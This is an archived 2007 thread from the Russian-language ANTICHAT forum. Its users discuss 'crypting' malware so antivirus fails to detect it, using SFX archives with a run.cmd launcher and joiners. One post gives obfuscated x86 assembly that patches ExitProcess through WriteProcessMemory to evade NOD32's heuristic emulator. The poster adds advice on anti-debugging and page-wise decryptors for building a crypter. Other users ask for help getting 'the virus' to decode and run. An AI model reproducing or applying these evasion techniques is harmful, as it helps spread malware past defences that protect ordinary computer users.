ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
28.01.2007, 14:44
|
|
Banned
Регистрация: 10.06.2006
Сообщений: 938
Провел на форуме:
7792614
Репутация:
1223
|
|
Хорошая статья 
вот тока один вопрос, у кого есть иконка фотографий в *.ico ? |
|
|
30.01.2007, 04:02
|
|
Banned
Регистрация: 10.06.2006
Сообщений: 938
Провел на форуме:
7792614
Репутация:
1223
|
|
Блин у меня проблема, я все делаю по инструкции, запускаю уже гатовый архив мне пишет ошибку что типа фаил не евляется програмой для вин32,
я как понимаю в run.cmd не выплолняется команда start crypter.exe
раньше все норм работало, а теперь блин... 
может кто встречался с проблемой?
+ меня раньше в винраре где прописываеш адрес куда будет распоковывотся, можно было галку ставить абсолютный путь, а теперь как пропачтил винрар т.к. срок истек нильзя туда галку ставить
вобще из-за чего может быть проблема? |
|
|
|
30.01.2007, 09:51
|
|
Banned
Регистрация: 18.05.2005
Сообщений: 1,981
Провел на форуме:
1941233
Репутация:
2726
|
|
я вам сейчас возможно открою секрет, а возможно нет
насколько я знаю у NOD32 самый мощный эвристик/эмулятор кода
я придумал (возможно не я первый) его обходить таким способом:
записать первым байтом ExitProcess retn (0xc3), вызвать ее а потом восстановить старый байт (надо его прочитать)
выдираю код (с анти-интеллектульным мусором) из одной своей фигни (все исправлять уже очень лень)
Код:
; WriteProcessMemory at kernel32.ExitProcess
mov eax, 0x1f
mov ecx, WriteProcessMemory+0x43
mov edi, ecx
inc eax
dec eax
lea ebx, [bwrite]
nop
nop
jmp nop5
dd 0x90909090
dd 0x90909090
dd 0x90909090
dd 0x90909090
nop5:
push ebx
push 3
lea ebx, [cmd_retn]
push ebx
mov ebx, ExitProcess-2
inc ebx
sub ebx, -1
nop
nop
mov ecx, [ebx]
xchg ebx, ecx
sub eax, 2
nop
nop
aad
xor [cmd_retn], 0x55
jmp nop6
dd 0x90909090
dd 0x90909090
dd 0x90909090
dd 0x90909090
nop6:
sub ebx, eax
push ebx
add dword [esp], 0x1f
dec dword [esp]
mov esi, edi
dec dword [esp]
push 1
dec dword [esp]
sub dword [esp], 1
mov ecx, esi
jmp nop7
dd 0x90909090
dd 0x90909090
dd 0x90909090
dd 0x90909090
nop7:
call dword [ecx-0x43]
nop
nop
; jmp ml
; goodbye, NOD32 heu
finvoke ExitProcess, 0
когда я это все делал, работало отлично. NOD видел завершение обычное процесса
и весь код дальше его эмулятор не выполнял. далее можно расшифровывать любым алгоритмом остальной код и запускать его. На SEH нод не реагирует.
Из этого помоему уже можно что-нибудь придумать.
Добавьте некоторые старые антиотладочные приёмы, сделайте навесной расшифровщик постраничный
и у вас получится офигенный криптор.
хэк?
Последний раз редактировалось KEZ; 30.01.2007 в 09:54..
|
|
|
|
02.02.2007, 16:59
|
|
Новичок
Регистрация: 27.01.2007
Сообщений: 20
Провел на форуме:
129456
Репутация:
17
|
|
не, лучше уж я постаринке, хороший криптор + хороший джойнер))
|
|
|
|
02.02.2007, 18:29
|
|
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,188
Провел на форуме:
6023777
Репутация:
2642
|
|
Тоже пробовал криптовать Sfx архивом, но чёт не помогало, а это прокатило =)
|
|
|
|
03.02.2007, 02:23
|
|
Постоянный
Регистрация: 14.09.2005
Сообщений: 415
Провел на форуме:
1052005
Репутация:
131
|
|
Сообщение от Ksander
Если выкладывать приватный криптор, то через пару дней о нем можно будет забыть, бо толку 0.
полне согласен , НО товарисч помог тем которые ищут то что не могут сами зделать или написать , то есть комуто + и не тока кому то , а и от кавота если не забудут тож , я думаю не сложно 1 рах написать для кавота то есть для чайника что и как и почему , если он не дурак возможность использует ну а если дурак то увы , етот + в сторону каспера итп......
|
|
|
|
04.02.2007, 02:41
|
|
Banned
Регистрация: 10.06.2006
Сообщений: 938
Провел на форуме:
7792614
Репутация:
1223
|
|
Объясните пожалуйсто ну уже блин! почему у меня такая проблема?
Проблема описана тут |
|
|
|
04.02.2007, 18:53
|
|
Новичок
Регистрация: 26.01.2007
Сообщений: 13
Провел на форуме:
27367
Репутация:
0
|
|
Сообщение от kez
Добавьте некоторые старые антиотладочные приёмы, сделайте навесной расшифровщик постраничный
и у вас получится офигенный криптор.
раскажы плз как мона ето все примерн написать
|
|
|
|
04.02.2007, 20:52
|
|
Постоянный
Регистрация: 22.04.2006
Сообщений: 566
Провел на форуме:
1325772
Репутация:
517
|
|
Сообщение от Sandjuro
Объясните пожалуйсто ну уже блин! почему у меня такая проблема?
Проблема описана тутфиговый архивер, с урезанным функционалом.
|
|
|
|
10.02.2007, 13:15
|
|
Новичок
Регистрация: 13.12.2006
Сообщений: 4
Провел на форуме:
8337
Репутация:
-1
|
|
Всем привет у меня проблемма. При запуске файла, вирус не успевает вовремя перекодироваться и из-за этого ничего не работает. Теперь вопрос: Как поставить задержку на .cmd? Cпасибо.
 |
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
